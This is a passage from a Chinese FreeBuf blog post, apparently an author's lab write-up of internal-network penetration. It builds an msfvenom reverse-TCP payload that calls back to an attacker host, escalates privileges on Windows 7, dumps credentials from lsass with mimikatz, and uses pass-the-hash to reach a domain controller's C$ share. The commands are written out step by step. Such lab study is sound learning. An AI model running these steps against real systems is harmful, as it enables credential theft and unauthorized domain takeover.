freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

使用mimikata获取域控权限(无免杀)
Koi 2024-02-06 09:42:51 130030

一、实验环境

windows 7 ip:192.168.1.3 (域内普通用户,有本地管理员权限,但不知明文密码)
windows server 2012 ip:192.168.1.1 (DC域控,与server2012管理员密码相同,但不知明文密码)

二、准备工作

1、使用模块生成木马文件

msfvenom -p  windows/x64/meterpreter/reverse_tcp lhost=192.168.200.14 lport=1234 -f exe -o shell.exe

开启服务

1707183496_65c18d883d601e64a9b44.png!small?1707183497210

2、访问http://192.168.200.14:8000点击shell文件下载(也可以直接)

1707183507_65c18d936419e811f264d.png!small?1707183508306

3、在kali中使用监听模块,输入use exploit/multi/handler进入到监听模块

设置本地IP地址和监听端口

1707183516_65c18d9cc1737bffb62b1.png!small?1707183517898

4、设置payload并且运行

回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接,shell之后更改编码,看到当前用户是普通用户

1707183526_65c18da6528eb7ae9d662.png!small?1707183527697

5、接着输入exit退出终端然后输入background将监听挂载在后台

列出当前全部会话,并且使用其中一个会话之后,构建一个exploit/windows\local\ask的会话,将当前会话应用

注意:本提权方式旨在提高程序运行级别(exploit/windows\local\ask

利用高权限的方式去重启一个session,并不是真正意义上的提权,并未真去绕过用户的完全控制权限,会触发UAC,当用户点击之后才会出现新的高权限的session

目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个高权限shell。

1707183534_65c18dae84d1068e550fa.png!small?1707183536434

6、需要设置一个名为pingtunnel.exe的通道

1707183545_65c18db9006dc25ccecec.png!small?1707183546056

1707183551_65c18dbfca17a82fc65d4.png!small?1707183552847

提权失败

1707183561_65c18dc97264ca28d88a3.png!small?1707183562743

从提权时报错信息来看,可能是命名错误,将从新执行一遍

1707183570_65c18dd211a1e59e33366.png!small?1707183571178

后续工作就是提升权限至system权限

第一步、提权成功

(用后门得到权限,使用getuid命令查看当前用户权限是否为system,可以用getsystem进行提权,因为mimikatz要system权限)

此时,你已经拿下了域内一台机器windows 7

1707183581_65c18ddd8e6b5a77493fe.png!small?1707183582718

1707183587_65c18de39edff1c20bf3b.png!small?1707183588537第二步、输入输入privilege::debug 提升权限

1707183595_65c18debcae71f2107d81.png!small?1707183597263

第三步:输入inject::process lsass.exe sekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中(可以不用输入)

1707183602_65c18df2e17ee2da02aae.png!small?1707183604682

1707183610_65c18dfa240acaefe50ca.png!small?1707183611482

第四步、输入sekurlsa::logonPasswords full 即可获取hash和当前用户的明文密码

1707183619_65c18e032f257712dee5e.png!small?1707183620049

三、使用mimikatz利用哈希传递攻击,获取域控权限

攻击机:win7

sekurlsa::pth /user:administrator /domain:域控IP /ntlm:域控的hash值

1707183627_65c18e0b2641f724e9dc5.png!small?1707183628532成功打开另外一个cmd

在新的cmd命令行中输入dir \\192.168.1.1\c$即可查看目标机器内容

读取win7的C盘以及文件内容的方式
dir \\192.168.3.133\C$
type \\192.168.3.133\C$\xxx.txt

当前目录下便是DC下的目录

1707183641_65c18e1997e7a445a0a99.png!small?1707183642450

本文是作者在初学内网中的一个案例实践,逻辑方面可能会有问题,但方法应该不会有误,若本文能有帮助及供各位参考的地方,不胜荣幸。

# 网络安全 # web安全 # 内网渗透
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Koi LV.6
每个人都是都是独一无二的个体。
  • 41 文章数
  • 28 关注者
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
Vulhub 练习 DC-4靶机完整复现
2024-03-11
文章目录